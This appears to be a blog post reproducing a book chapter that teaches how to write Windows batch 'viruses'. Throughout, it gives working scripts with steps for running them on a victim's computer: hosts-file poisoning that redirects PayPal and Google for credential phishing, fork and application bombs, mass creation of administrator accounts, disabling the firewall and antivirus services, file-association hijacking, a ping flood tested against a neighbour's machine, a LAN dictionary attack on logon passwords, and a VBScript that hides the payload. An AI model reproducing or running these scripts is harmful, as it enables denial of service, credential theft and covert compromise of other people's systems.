There
were few things that are un-covered in most of the batch programs, and that is
nothing but
the
dark-side of the batch. Batch program offers its programmers to create their
custom viruses just by
misusing
the way the command works, which leads to the creation of batch viruses. In
this chapter we are
going
to learn about the dark-side of the batch by learning how to misuse commands to
create batch
viruses.
Folder Replicator Virus:
Here
is a Simple batch virus that contains only 6 lines, has the tendency to
replicate itself again
and
again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad,
copy and paste the below code
cd\
cd C:\Documents and
Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file
with the extension .bat, before doing that you have to modify the code by
changing
the place where it says ‘username’ and instead of that replace it by the currently logged in
username.
3. Then run it on the Victims
computer to infect it.
4. Any how it doesn’t cause
much harm, but replicates folder inside a folder and goes on.
Once
more thing that you have to notice is that, this will create directory inside
another directory with the
same
name, so it doesn’t looks like crap, since everything reside inside one main
directory, more over
deleting
the root directory will purge all the clumsy thing done by this piece of code.
128
DNS poisoning:
Batch
file can has the tendency to modify the transfer zones by editing the hosts.txt
file that
resides
inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious
websites
instead of landing you to the legitimate website. This may also be used for
phishing, i.e.
redirecting
you to a bogus website which looks exactly like the legitimate one, and then
steal credentials.
@echo off
echo 10.199.64.66 www.google.com >>
C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >>
C:\windows\system32\drivers\etc\hosts.txt
exit
This
program creates a new entry in the hosts file, so that whenever an user
attempts to move to
www.google.com, he will be re-directed to another host that has the IP address
of 10.199.64.66, likewise
if
the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to
another
external bogus website that has the IP address of 10.199.64.67, where if the
user enters the
credentials
unknowingly, they were into the hackers database and he can use it for several
other purposes.
Fork Bombing:
Most
of them have heard about the word ‘fork()’, which is used to create child process, like wise
fork
bombing is nothing but calling a program by itself again and again with a
infinite loop and making
the
system to crash by popping up hundreds of windows on the screen.
@echo off
:loop
Explorer
Call fork.bat
Goto loop
Copy
the above program and paste it in a notepad file and save it as ‘fork.bat’. The
explorer
command
will open up the ‘documents’ directory, and it is given inside a loop, then the
same batch file is
called
again which in turn opens up multiple documents rolled out in a loop, likewise
it goes on by calling
the
program itself again and again until the system crashes or hangs up.
Application Bomber:
Application
bomber is a superset of window bomber, this has a close relation to the above
given
fork
bomber program, where in this ‘application bomber’ we don’t call the program
using the name itself
(simply
known as fork), where as we are going to open up applications continuously
using a loop.
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
When
the above given batch program is executed, it will open up the following
applications such
as
notepad, word document, Microsoft paint, WordPad, command prompt, my documents,
control panel,
and
calculator in an infinite loop causing the system to collapse and as a result
the system simply crashes
or
reboots. Just imagine the same using a fork concept; oops! it will make the
system crash immediately.
Msg Annoyer:
Message
annoyer is a batch program that uses the same concept as above, but will
interact with
the
user anyhow annoying and irritating them by popping up some message box
containing some
messages
in it.
@echo off
:annoy
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will
be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy
This
program will pops up a small message box as shown below,
Containing
the text mentioned in the program given above.
This
message box will pop up until for endless loop, which really annoys the person
sitting before the
computer.
Even these small popup windows may crash the computer, if it overloads the
memory.
136
User Flooder:
The
‘user flooder’ program will create a number of user accounts with random
numbers, and
assign
administrator rights to them by itself, moreover the password set for those
user accounts were too
random
numbers.
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
Since
we have already learned about the environment variables, the ‘%random%’ is an
environment
variable that generates a random positive integer. We have set a variable
manually named
‘usr’
for holding the random number generated by the %random%, then a new user account is created
with
the generated number as the account name and was assigned with a random
password, then assigned
with
administrator rights, and this process gets repeated for a infinite loop, so it
will create more than 50
user
accounts in less than a minute. This will sure degrade the computer performance
and the user will
take
a long long time to delete the user accounts, sometimes they will simply format
their hard drives.
The
best way to delete the user account is like the way we have created it and is
very simple, so I
am
going to make this as a challenge for those who take the chance to experiment
with this and get rid of
those
user accounts with a simple batch program. You may mail me the batch required
to solve this issue
along
with the steps required to do so, here is my mail id info.prem4u[at]gmail[dot]com.
137
Matrix Folder flooder:
The
following piece of code is going to help flood you computer with junky folders.
This
program
has the tendency to create more than 3000 folders in just less than a minute.
@echo off
:loop
mkdir %random%
goto loop
Here
I have enclosed the screenshot took while I was testing this code on my
computer.
138
Service Disabler:
The
following piece of code is used for stopping some critical windows services.
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
This
program when executed will stop the ‘windows firewall’ service that is required to block
unwanted
datagram’s coming from the internet, ‘windows update’ service that is required to update
windows
patches and so on, ‘workstation’ service that is required for the computer to establish a peer to
peer
connection, ‘DHCP Client’ service that is required to register an available IP address
from the
DHCP
server, ‘DNS Client’ service that is required to resolve FQDN (Fully qualified Domain
Name) into
its
equivalent IP address, ‘print spooler’ service that is required to load the document to be printed in
the
spool,
and then the ‘themes’ service that is required to offer Themes and other graphical appearance.
Likewise
you may stop any of the services, even the anti-virus service that offers
protection from
malwares
will be stopped in this way.
So
when these services get stopped, it almost becomes impossible for the machine
to offer the service
what
they are supposed to do so, hence the user has to manually enable and start
these services again.
Broadcast Bomber:
The
‘broadcast bomber’ will broadcast messages infinitely to all the computers connected
to this
computer,
if it is in a network. Likewise the ‘msg flooder’ program that we have seen already, this helps
people
to annoy multiple people sitting and working in front of various other
computers connected with
the
same network.
@echo off
:netannoy
net send * Hi there!
net send * How u doin ?
net send * Are you fine ?
net send * Never mind about me....
net send * I am not here to annoy you....
net send * I am caring for you.....
net send * start counting from 1 to 5, i
Will be outta this place.....
net send * 1
net send * 2
net send * 3
net send * 4
net send * 5
goto netannoy
When
the above piece of code gets executed, it will display a pop up windows like
below,
On
all the computers that are connected with the same network, there by annoying
everyone who uses the
entire
network.
Keystroke Re-mapper:
The
following piece of batch program helps re-map the keystroke by changing the ‘scancodemap’
entry
in the registry editor. The code that I have enclosed here changes the key from
A to B, so that if any
users
press ‘a’ key on the keyboard he will be getting the ‘b’
displayed on the screen, likewise you may
map
any keys.
@echo off
reg add
"HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v
"Scancode
Map" /t REG_BINARY /d
00000000000000000200000030001e0000000000
exit
If
you want to create a new batch file for remapping other keys, you have to refer
the ascii codes for each
keys
that was pre assigned, and you can download it from http://tinyurl.com/8ua4gk.
Ext_changer:
This
virus program is created by misusing the assoc command. The ‘assoc’
command is used for
associating
an extension with the appropriate file type, for example .txt extensions are
supposed to be
associated
with textiles and so on.
@echo off
title Ext_changer
color a
Rem This Virus file replaces the actual
file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
Here
we are associating the native file extensions with some other type of file,
which makes the program
unable
to open or display the file in right format.
Packet flooder:
Since
we have already learned about the ‘ping of death’ and ‘DoS attacks’ in the
earlier chapters,
we
are creating this program to slow down the remote computer connected in our
network. This can be
done
by continuously pinging the remote host by setting the length of the packet to
65,500K. at the
receiving
end, the remote computer receives mushrooms of packets of larger size, and if
it goes on for
some
time, the memory on the remote system automatically overloads and finally the
remote system will
crash.
@echo off
:flood
ping -l 65500 -t 10.199.64.66
start flooder.bat
goto flood
I
am going to save this file as flooder.bat, since I have used the fork bombing
technique, it will open up
lot
of command windows on your screen too, there are chances for your computer to
crash too.
In
the above program I have used my neighboring computer 10.199.64.66 as my
victim, and I have tried
for
just 3 minutes running this program and I found the remote system restarting,
until then I have turned
off
my monitor, because my screen too was flooded with command prompt windows. You
may replace
the
IP address 10.199.64.66 with either your networked computer’s hostname or IP
address, if you want
to
check by yourself.
LAN Remote user – Dictionary Attack:
Use
this Batch file to launch a Dictionary attack and find the Windows logon
Credentials in a
LAN.
You need a Dictionary text file to proceed further to launch this attack
successfully.
Just
follow the steps below,
1. Open up a Notepad file.
2. Copy and paste the below
code and save it as a Batch file with .bat extension.
@echo off
Title LAN Dictionary Attack Launcher
Color 0a
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt)
do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2
2>>logfile.txt && ^
echo %time% %date% >> outfile.txt
&& ^
echo \\%1\ipc$ acct: %2 pass: %%i
>> output.txt && goto end
:fin
echo *****Done*****
3. Make sure that you have a
Dictionary Password Text file in the same location where you are going to
execute
this program. (Name should be
passlist.txt)
4. Now go to the command prompt
and then execute this program from there, along with the Target
computers
IP address or Hostname and the Valid Username.
The
Syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02
Administrator
Where,
LANbrute.bat – This is the Name of the
batch file that resides in the C Drive.
192.169.21.02 – IP Address of the Target
Computer.
Administrator – Victim Account that you
want to crack.
5. This program will start
launching Dictionary Attack against the administrator account on the Machine
192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right
match.
6. If the right password was
found, then it will save it in a text file named ‘output.txt’ on the same
directory.
Credits
to the Folks from Irongeek, because this is an idea by them, and after a little
mess with it, I have
included
it in this book.
Stealthy Virus using Vbscript:
As
we have seen in the previous chapters, all those programs at their time of
execution, it will
open
up a command window there by revealing that it was programmed using batch file
programming, in
order
to hide the programs at the time of execution, we may use a VBScript to stealth
our program, and it
will
be more useful while constructing and executing a virus on the victims
computer, so that it remains
un-notified.
Set objShell =
CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE
copy
the above coding into a notepad file, replace the ‘C:\ yourfile.bat’ with the actual name of the batch
file
that you have created, along with the location and then save this file with a
.vbs extension. Now you
may
execute this VBScript file to run the batch file too, so there is no need for
you to execute the batch
file
separately. Now the batch was still running in the background and remains
hidden.
The only way to end the
process is to open the task manager and kill the process that says Wscrpit.
[Disclaimer
Notification: All that information given in
this post is only for educational means.]
No comments:
Post a Comment